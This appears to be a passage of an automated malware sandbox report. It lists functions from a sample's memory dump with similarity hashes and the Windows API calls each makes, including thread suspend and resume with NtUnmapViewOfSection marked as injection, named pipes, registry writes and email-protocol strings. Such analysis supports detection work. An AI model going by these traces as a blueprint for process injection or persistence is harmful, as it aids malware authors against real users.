  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB47B, Relevance: 16.7, APIs: 11, Instructions: 187 Total matches: 59synchronizationstring
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF75B, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 172 Total matches: 23string
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
